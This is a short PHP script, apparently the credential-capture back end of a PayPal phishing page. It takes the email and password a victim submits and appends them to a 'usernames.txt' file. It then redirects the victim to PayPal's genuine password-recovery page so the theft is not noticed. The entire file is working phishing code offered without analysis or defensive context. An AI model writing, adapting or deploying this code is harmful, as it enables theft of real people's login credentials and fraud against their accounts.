1<?php 2 3file_put_contents("../userpass/usernames.txt", "Paypal Username: " . $_POST['login_email'] . " Pass: " . $_POST['login_password'] . "\n", FILE_APPEND); 4header('Location: https://www.paypal.com/authflow/password-recovery/'); 5exit(); 6?> 7